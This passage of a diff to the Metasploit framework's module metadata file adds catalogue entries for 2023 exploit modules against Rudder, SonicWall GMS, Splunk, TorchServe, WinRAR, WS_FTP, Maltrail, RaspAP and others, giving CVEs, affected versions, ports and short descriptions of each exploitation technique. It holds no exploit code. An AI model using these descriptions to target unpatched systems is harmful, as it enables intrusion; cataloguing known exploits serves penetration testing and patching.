"exploit_multi/http/openmediavault_cmd_exec": {
"name": "OpenMediaVault Cron Remote Command Execution",
"fullname": "exploit/multi/http/openmediavault_cmd_exec",
@@ -96999,6 +99045,67 @@
"session_types": false,
"needs_cleanup": true
},
"exploit_multi/http/rudder_server_sqli_rce": {
"name": "Rudder Server SQLI Remote Code Execution",
"fullname": "exploit/multi/http/rudder_server_sqli_rce",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-06-16",
"type": "exploit",
"author": [
"Ege Balcı <egebalci@pm.me>"
],
"description": "This Metasploit module exploits a SQL injection vulnerability in\n RudderStack's rudder-server, an open source Customer Data Platform (CDP).\n The vulnerability exists in versions of rudder-server prior to 1.3.0-rc.1.\n By exploiting this flaw, an attacker can execute arbitrary SQL commands,\n which may lead to Remote Code Execution (RCE) due to the `rudder` role\n in PostgreSQL having superuser permissions by default.",
"references": [
"CVE-2023-30625",
"URL-https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/",
"URL-https://nvd.nist.gov/vuln/detail/CVE-2023-30625"
],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix Command"
],
"mod_time": "2023-07-31 15:13:35 +0000",
"path": "/modules/exploits/multi/http/rudder_server_sqli_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/rudder_server_sqli_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": true
},
"exploit_multi/http/sflog_upload_exec": {
"name": "Sflog! CMS 1.0 Arbitrary File Upload Vulnerability",
"fullname": "exploit/multi/http/sflog_upload_exec",
@@ -97544,6 +99651,71 @@
"session_types": false,
"needs_cleanup": true
},
"exploit_multi/http/sonicwall_shell_injection_cve_2023_34124": {
"name": "Sonicwall",
"fullname": "exploit/multi/http/sonicwall_shell_injection_cve_2023_34124",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-07-12",
"type": "exploit",
"author": [
"fulmetalpackets <fulmetalpackets@gmail.com>",
"Ron Bowes <rbowes@rapid7.com>"
],
"description": "This module exploits a series of vulnerabilities - including auth\n bypass, SQL injection, and shell injection - to obtain remote code\n execution on SonicWall GMS versions <= 9.9.9320.",
"references": [
"URL-https://www.rapid7.com/blog/post/2023/07/13/etr-sonicwall-recommends-urgent-patching-for-gms-and-analytics-cves/",
"CVE-2023-34124",
"CVE-2023-34133",
"CVE-2023-34132",
"CVE-2023-34127"
],
"platform": "",
"arch": "",
"rport": "443",
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux Dropper",
"Windows Command",
"Linux Command"
],
"mod_time": "2023-09-06 14:11:29 +0000",
"path": "/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb",
"is_install_path": true,
"ref_name": "multi/http/sonicwall_shell_injection_cve_2023_34124",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/http/splunk_mappy_exec": {
"name": "Splunk Search Remote Code Execution",
"fullname": "exploit/multi/http/splunk_mappy_exec",
@@ -97598,6 +99770,70 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/http/splunk_privilege_escalation_cve_2023_32707": {
"name": "Splunk \"edit_user\" Capability Privilege Escalation",
"fullname": "exploit/multi/http/splunk_privilege_escalation_cve_2023_32707",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-06-01",
"type": "exploit",
"author": [
"Mr Hack (try_to_hack) Santiago Lopez",
"Heyder Andrade",
"Redway Security <redwaysecurity.com>"
],
"description": "A low-privileged user who holds a role that has the \"edit_user\" capability assigned to it\n can escalate their privileges to that of the admin user by providing a specially crafted web request.\n This is because the \"edit_user\" capability does not honor the \"grantableRoles\" setting in the authorize.conf\n configuration file, which prevents this scenario from happening.\n\n This exploit abuses this vulnerability to change the admin password and login with it to upload a malicious app achieving RCE.",
"references": [
"CVE-2023-32707",
"URL-https://advisory.splunk.com/advisories/SVD-2023-0602",
"URL-https://blog.redwaysecurity.com/2023/09/exploit-cve-2023-32707.html",
"URL-https://github.com/redwaysecurity/CVEs/tree/main/CVE-2023-32707"
],
"platform": "Linux,OSX,Unix,Windows",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Splunk < 9.0.5, 8.2.11, and 8.1.14 / Linux",
"Splunk < 9.0.5, 8.2.11, and 8.1.14 / Windows"
],
"mod_time": "2023-10-26 14:03:06 +0000",
"path": "/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb",
"is_install_path": true,
"ref_name": "multi/http/splunk_privilege_escalation_cve_2023_32707",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/http/splunk_upload_app_exec": {
"name": "Splunk Custom App Remote Code Execution",
"fullname": "exploit/multi/http/splunk_upload_app_exec",
@@ -98788,6 +101024,71 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/http/subrion_cms_file_upload_rce": {
"name": "Intelliants Subrion CMS 4.2.1 - Authenticated File Upload Bypass to RCE",
"fullname": "exploit/multi/http/subrion_cms_file_upload_rce",
"aliases": [
],
"rank": 600,
"disclosure_date": "2018-11-04",
"type": "exploit",
"author": [
"Hexife",
"Fellipe Oliveira",
"Ismail E. Dawoodjee"
],
"description": "This module exploits an authenticated file upload vulnerability in\n Subrion CMS versions 4.2.1 and lower. The vulnerability is caused by\n the .htaccess file not preventing the execution of .pht, .phar, and\n .xhtml files. Files with these extensions are not included in the\n .htaccess blacklist, hence these files can be uploaded and executed\n to achieve remote code execution. In this module, a .phar file with\n a randomized name is uploaded and executed to receive a Meterpreter\n session on the target, then deletes itself afterwards.",
"references": [
"EDB-49876",
"CVE-2018-19422",
"URL-https://github.com/intelliants/subrion/issues/801",
"URL-https://github.com/intelliants/subrion/issues/840",
"URL-https://github.com/advisories/GHSA-73xj-v6gc-g5p5"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PHP"
],
"mod_time": "2023-08-02 10:10:27 +0000",
"path": "/modules/exploits/multi/http/subrion_cms_file_upload_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/subrion_cms_file_upload_rce",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/http/sugarcrm_webshell_cve_2023_22952": {
"name": "SugarCRM unauthenticated Remote Code Execution (RCE)",
"fullname": "exploit/multi/http/sugarcrm_webshell_cve_2023_22952",
@@ -99252,6 +101553,74 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/http/torchserver_cve_2023_43654": {
"name": "PyTorch Model Server Registration and Deserialization RCE",
"fullname": "exploit/multi/http/torchserver_cve_2023_43654",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-10-03",
"type": "exploit",
"author": [
"Idan Levcovich",
"Guy Kaplan",
"Gal Elbaz",
"Swapneil Kumar Dash",
"Spencer McIntyre"
],
"description": "The PyTorch model server contains multiple vulnerabilities that can be chained together to permit an\n unauthenticated remote attacker arbitrary Java code execution. The first vulnerability is that the management\n interface is bound to all IP addresses and not just the loop back interface as the documentation suggests. The\n second vulnerability (CVE-2023-43654) allows attackers with access to the management interface to register MAR\n model files from arbitrary servers. The third vulnerability is that when an MAR file is loaded, it can contain a\n YAML configuration file that when deserialized by snakeyaml, can lead to loading an arbitrary Java class.",
"references": [
"URL-https://www.oligo.security/blog/shelltorch-torchserve-ssrf-vulnerability-cve-2023-43654",
"CVE-2023-43654",
"URL-https://github.com/pytorch/serve/security/advisories/GHSA-8fxr-qfr9-p34w",
"CVE-2022-1471",
"URL-https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2",
"URL-https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in",
"URL-https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858"
],
"platform": "",
"arch": "",
"rport": 8081,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2023-10-11 16:56:20 +0000",
"path": "/modules/exploits/multi/http/torchserver_cve_2023_43654.rb",
"is_install_path": true,
"ref_name": "multi/http/torchserver_cve_2023_43654",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/http/totaljs_cms_widget_exec": {
"name": "Total.js CMS 12 Widget JavaScript Code Injection",
"fullname": "exploit/multi/http/totaljs_cms_widget_exec",
@@ -101131,6 +103500,73 @@
"session_types": false,
"needs_cleanup": true
},
"exploit_multi/http/wp_plugin_fma_shortcode_unauth_rce": {
"name": "Wordpress File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution through shortcode",
"fullname": "exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-05-31",
"type": "exploit",
"author": [
"h00die-gr3y <h00die.gr3y@gmail.com>",
"Mateus Machado Tesser"
],
"description": "The Wordpress plugin does not adequately prevent uploading files with disallowed MIME types when using the shortcode.\n This leads to RCE in cases where the allowed MIME type list does not include PHP files.\n In the worst case, this is available to unauthenticated users, but is also works in an authenticated configuration.\n File Manager Advanced Shortcode plugin version `2.3.2` and lower are vulnerable.\n To install the Shortcode plugin File Manager Advanced version `5.0.5` or lower is required to keep the configuration\n vulnerable. Any user privileges can exploit this vulnerability which results in access to the underlying operating system\n with the same privileges under which the Wordpress web services run. ",
"references": [
"CVE-2023-2068",
"URL-https://attackerkb.com/topics/JncRCWZ5xm/cve-2023-2068",
"PACKETSTORM-172707",
"WPVDB-58f72953-56d2-4d86-a49b-311b5fc58056"
],
"platform": "Linux,PHP,Unix,Windows",
"arch": "cmd, php, x64, x86, aarch64",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PHP",
"Unix Command",
"Linux Dropper",
"Windows Command",
"Windows Dropper"
],
"mod_time": "2023-07-06 10:09:51 +0000",
"path": "/modules/exploits/multi/http/wp_plugin_fma_shortcode_unauth_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/wp_plugin_fma_shortcode_unauth_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
},
"session_types": false,
"needs_cleanup": true
},
"exploit_multi/http/wp_plugin_modern_events_calendar_rce": {
"name": "Wordpress Plugin Modern Events Calendar - Authenticated Remote Code Execution",
"fullname": "exploit/multi/http/wp_plugin_modern_events_calendar_rce",
@@ -104697,6 +107133,66 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/php/jorani_path_trav": {
"name": "Jorani unauthenticated Remote Code Execution",
"fullname": "exploit/multi/php/jorani_path_trav",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-01-06",
"type": "exploit",
"author": [
"RIOUX Guilhem (jrjgjk)"
],
"description": "This module exploits an unauthenticated Remote Code Execution in Jorani prior to 1.0.2.\n It abuses 3 vulnerabilities: log poisoning and redirection bypass via header spoofing, then it uses path traversal to trigger the vulnerability.\n It has been tested on Jorani 1.0.0.",
"references": [
"CVE-2023-26469",
"URL-https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py"
],
"platform": "PHP",
"arch": "php",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Jorani < 1.0.2"
],
"mod_time": "2023-08-18 15:40:58 +0000",
"path": "/modules/exploits/multi/php/jorani_path_trav.rb",
"is_install_path": true,
"ref_name": "multi/php/jorani_path_trav",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/php/php_unserialize_zval_cookie": {
"name": "PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)",
"fullname": "exploit/multi/php/php_unserialize_zval_cookie",
@@ -108346,7 +110842,7 @@
"SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware",
"SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VirtualBox"
],
"mod_time": "2020-12-07 01:55:18 +0000",
"mod_time": "2023-08-09 00:22:57 +0000",
"path": "/modules/exploits/solaris/ssh/pam_username_bof.rb",
"is_install_path": true,
"ref_name": "solaris/ssh/pam_username_bof",
@@ -109587,6 +112083,68 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_unix/http/maltrail_rce": {
"name": "Maltrail Unauthenticated Command Injection",
"fullname": "exploit/unix/http/maltrail_rce",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-07-31",
"type": "exploit",
"author": [
"Ege BALCI <egebalci@pm.me>",
"Chris Wild"
],
"description": "Maltrail is a malicious traffic detection system, utilizing publicly\n available blacklists containing malicious and/or generally suspicious trails.\n The Maltrail versions < 0.54 is suffering from a command injection vulnerability.\n The `subprocess.check_output` function in `mailtrail/core/http.py` contains\n a command injection vulnerability in the `params.get(\"username\")` parameter.\n An attacker can exploit this vulnerability by injecting arbitrary OS commands\n into the username parameter. The injected commands will be executed with the\n privileges of the running process. This vulnerability can be exploited remotely\n without authentication.\n\n Successfully tested against Maltrail versions 0.52 and 0.53.",
"references": [
"EDB-51676",
"URL-https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/",
"URL-https://github.com/stamparm/maltrail/issues/19146"
],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64",
"rport": 8338,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix Command",
"Linux Dropper"
],
"mod_time": "2023-08-16 16:52:48 +0000",
"path": "/modules/exploits/unix/http/maltrail_rce.rb",
"is_install_path": true,
"ref_name": "unix/http/maltrail_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_unix/http/pfsense_clickjacking": {
"name": "Clickjacking Vulnerability In CSRF Error Page pfSense",
"fullname": "exploit/unix/http/pfsense_clickjacking",
@@ -110158,6 +112716,68 @@
"session_types": false,
"needs_cleanup": true
},
"exploit_unix/http/raspap_rce": {
"name": "RaspAP Unauthenticated Command Injection",
"fullname": "exploit/unix/http/raspap_rce",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-07-31",
"type": "exploit",
"author": [
"Ege BALCI <egebalci@pm.me>",
"Ismael0x00"
],
"description": "RaspAP is feature-rich wireless router software that just works\n on many popular Debian-based devices, including the Raspberry Pi.\n A Command Injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows\n unauthenticated attackers to execute arbitrary commands in the context of the user running RaspAP via the cfg_id\n parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.\n\n Successfully tested against RaspAP 2.8.0 and 2.8.7.",
"references": [
"CVE-2022-39986",
"URL-https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2",
"URL-https://github.com/advisories/GHSA-7c28-wg7r-pg6f"
],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix Command",
"Linux Dropper"
],
"mod_time": "2023-08-10 10:10:02 +0000",
"path": "/modules/exploits/unix/http/raspap_rce.rb",
"is_install_path": true,
"ref_name": "unix/http/raspap_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_unix/http/schneider_electric_net55xx_encoder": {
"name": "Schneider Electric Pelco Endura NET55XX Encoder",
"fullname": "exploit/unix/http/schneider_electric_net55xx_encoder",
@@ -120629,7 +123249,7 @@
"Backup Exec 16 (16.0 / revision 9.2), Windows <= 7 x64",
"Backup Exec 16 (16.0 / revision 9.2), Windows <= 7 x86"
],
"mod_time": "2021-02-19 20:35:33 +0000",
"mod_time": "2023-07-14 12:46:26 +0000",
"path": "/modules/exploits/windows/backupexec/ssl_uaf.rb",
"is_install_path": true,
"ref_name": "windows/backupexec/ssl_uaf",
@@ -136687,6 +139307,58 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_windows/fileformat/greenshot_deserialize_cve_2023_34634": {
"name": "Greenshot .NET Deserialization Fileformat Exploit",
"fullname": "exploit/windows/fileformat/greenshot_deserialize_cve_2023_34634",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-07-26",
"type": "exploit",
"author": [
"p4r4bellum",
"bwatters-r7"
],
"description": "There exists a .NET deserialization vulnerability in Greenshot version 1.3.274\n and below. The deserialization allows the execution of commands when a user opens\n a Greenshot file. The commands execute under the same permissions as the Greenshot\n service. Typically, is the logged in user.",
"references": [
"CVE-2023-34634",
"EDB-51633"
],
"platform": "Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2023-08-17 08:48:42 +0000",
"path": "/modules/exploits/windows/fileformat/greenshot_deserialize_cve_2023_34634.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/greenshot_deserialize_cve_2023_34634",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk",
"screen-effects"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_windows/fileformat/gsm_sim": {
"name": "GSM SIM Editor 5.15 Buffer Overflow",
"fullname": "exploit/windows/fileformat/gsm_sim",
@@ -136937,7 +139609,7 @@
"HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]",
"Heroes III Demo 1.0.0.0 [h3demo.exe 522B6F45F534058D02A561838559B1F4]"
],
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-07-14 12:46:26 +0000",
"path": "/modules/exploits/windows/fileformat/homm3_h3m.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/homm3_h3m",
@@ -140674,7 +143346,7 @@
"VLC 2.2.8 on Windows 10 x86",
"VLC 2.2.8 on Windows 10 x64"
],
"mod_time": "2022-04-19 20:42:23 +0000",
"mod_time": "2023-07-14 12:46:26 +0000",
"path": "/modules/exploits/windows/fileformat/vlc_mkv.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/vlc_mkv",
@@ -141092,6 +143764,58 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_windows/fileformat/winrar_cve_2023_38831": {
"name": "WinRAR CVE-2023-38831 Exploit",
"fullname": "exploit/windows/fileformat/winrar_cve_2023_38831",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-08-23",
"type": "exploit",
"author": [
"Alexander \"xaitax\" Hagenah"
],
"description": "This module exploits a vulnerability in WinRAR (CVE-2023-38831). When a user opens a crafted RAR file and its\n embedded document, the decoy document is executed, leading to code execution.",
"references": [
"CVE-2023-38831",
"URL-https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/",
"URL-https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/"
],
"platform": "Windows",
"arch": "x64, x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2023-09-07 22:01:49 +0000",
"path": "/modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/winrar_cve_2023_38831",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs",
"artifacts-on-disk"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_windows/fileformat/winrar_name_spoofing": {
"name": "WinRAR Filename Spoofing",
"fullname": "exploit/windows/fileformat/winrar_name_spoofing",
@@ -151011,6 +153735,66 @@
"session_types": false,
"needs_cleanup": true
},
"exploit_windows/http/lg_simple_editor_rce": {
"name": "LG Simple Editor Remote Code Execution",
"fullname": "exploit/windows/http/lg_simple_editor_rce",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-08-24",
"type": "exploit",
"author": [
"rgod",
"Ege Balcı <egebalci@pm.me>"
],
"description": "This Metasploit module exploits broken access control and directory traversal\n vulnerabilities in LG Simple Editor software for gaining code execution.\n The vulnerabilities exist in versions of LG Simple Editor prior to v3.21.\n By exploiting this flaw, an attacker can upload and execute a malicious JSP\n payload with the SYSTEM user permissions.",
"references": [
"ZDI-23-1204",
"CVE-2023-40498"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"LG Simple Editor <= v3.21"
],
"mod_time": "2023-09-07 17:00:17 +0000",
"path": "/modules/exploits/windows/http/lg_simple_editor_rce.rb",
"is_install_path": true,
"ref_name": "windows/http/lg_simple_editor_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": false,
"needs_cleanup": true
},
"exploit_windows/http/mailenable_auth_header": {
"name": "MailEnable Authorization Header Buffer Overflow",
"fullname": "exploit/windows/http/mailenable_auth_header",
@@ -152243,17 +155027,23 @@
"disclosure_date": "2016-02-04",
"type": "exploit",
"author": [
"Ege BALCI <egebalci@pm.me>",
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n The application has a file upload vulnerability that can be exploited by an\n unauthenticated remote attacker to execute code as the SYSTEM user.\n Two servlets are vulnerable, FileUploadController (located at\n /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do).\n This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and\n 1.1.0.13.",
"description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n The application has multiple vulnerabilities that can allow an unauthenticated remote\n attacker to execute code as SYSTEM user. Vulnerabilities include authentication bypass,\n SQL injection, arbitrary file upload, and privilege escalation across various versions.\n This module is able to spawn a meterpreter session by chaining together two specific\n vulnerabilities inside the FileUploadController and MyHandlerInterceptor classes.\n This module has been tested with versions 1.5.0.2, 1.4.0.17, 1.1.0.13, 1.7.0.12, and 1.7.0.1.",
"references": [
"ZDI-23-920",
"ZDI-23-918",
"CVE-2023-38096",
"CVE-2023-38098",
"CVE-2016-1525",
"US-CERT-VU-777024",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt",
"URL-https://seclists.org/fulldisclosure/2016/Feb/30"
"URL-https://seclists.org/fulldisclosure/2016/Feb/30",
"URL-https://kb.netgear.com/000065707/Security-Advisory-for-Multiple-Vulnerabilities-on-the-ProSAFE-Network-Management-System-PSV-2023-0024-PSV-2023-0025"
],
"platform": "Windows",
"arch": "x86",
"arch": "x86, x64",
"rport": 8080,
"autofilter_ports": [
80,
@@ -152273,7 +155063,7 @@
"targets": [
"NETGEAR ProSafe Network Management System 300 / Windows"
],
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-08-02 18:03:57 +0000",
"path": "/modules/exploits/windows/http/netgear_nms_rce.rb",
"is_install_path": true,
"ref_name": "windows/http/netgear_nms_rce",
@@ -152281,6 +155071,16 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs",
"artifacts-on-disk"
]
},
"session_types": false,
"needs_cleanup": null
@@ -155570,6 +158370,67 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_windows/http/ws_ftp_rce_cve_2023_40044": {
"name": "Progress Software WS_FTP Unauthenticated Remote Code Execution",
"fullname": "exploit/windows/http/ws_ftp_rce_cve_2023_40044",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-09-27",
"type": "exploit",
"author": [
"sfewer-r7"
],
"description": "This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code\n execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP Server\n prior to 2020.0.4 (version 8.7.4) and 2022.0.2 (version 8.8.2) are vulnerable to this issue. The vulnerability\n was originally discovered by AssetNote.",
"references": [
"CVE-2023-40044",
"URL-https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044/rapid7-analysis",
"URL-https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023",
"URL-https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044"
],
"platform": "Windows",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows"
],
"mod_time": "2023-10-04 09:39:25 +0000",
"path": "/modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb",
"is_install_path": true,
"ref_name": "windows/http/ws_ftp_rce_cve_2023_40044",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_windows/http/xampp_webdav_upload_php": {
"name": "XAMPP WebDAV PHP Upload",
"fullname": "exploit/windows/http/xampp_webdav_upload_php",
@@ -158267,7 +161128,7 @@
"targets": [
"Automatic"
],
"mod_time": "2023-05-25 12:45:30 +0000",
"mod_time": "2023-07-21 15:34:49 +0000",
"path": "/modules/exploits/windows/local/bypassuac_comhijack.rb",
"is_install_path": true,
"ref_name": "windows/local/bypassuac_comhijack",
@@ -158322,7 +161183,7 @@
"targets": [
"Windows x64"
],
"mod_time": "2023-05-25 12:45:30 +0000",
"mod_time": "2023-07-21 15:34:49 +0000",
"path": "/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb",
"is_install_path": true,
"ref_name": "windows/local/bypassuac_dotnet_profiler",
@@ -158888,7 +161749,7 @@
"TheWack0lian",
"OJ Reeves"
],
"description": "This module abuses the Capcom.sys kernel driver's function that allows for an\n arbitrary function to be executed in the kernel from user land. This function\n purposely disables SMEP prior to invoking a function given by the caller.\n This has been tested on Windows 7, 8.1 and Windows 10 (x64).",
"description": "This module abuses the Capcom.sys kernel driver's function that allows for an\n arbitrary function to be executed in the kernel from user land. This function\n purposely disables SMEP prior to invoking a function given by the caller.\n This has been tested on Windows 7, 8.1, 10 (x64) and Windows 11 (x64) upto build 22000.194.\n Note that builds after 22000.194 contain deny lists that prevent this driver from loading.",
"references": [
"URL-https://twitter.com/TheWack0lian/status/779397840762245124"
],
@@ -158902,9 +161763,9 @@
],
"targets": [
"Windows x64 (<= 10)"
"Windows x64"
],
"mod_time": "2023-05-25 12:45:30 +0000",
"mod_time": "2023-09-08 13:05:44 +0000",
"path": "/modules/exploits/windows/local/capcom_sys_exec.rb",
"is_install_path": true,
"ref_name": "windows/local/capcom_sys_exec",
@@ -160049,6 +162910,60 @@
],
"needs_cleanup": null
},
"exploit_windows/local/cve_2023_28252_clfs_driver": {
"name": "Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability",
"fullname": "exploit/windows/local/cve_2023_28252_clfs_driver",
"aliases": [
],
"rank": 400,
"disclosure_date": "2023-04-11",
"type": "exploit",
"author": [
"Ricardo Narvaja",
"Esteban.kazimirow",
"jheysel-r7"
],
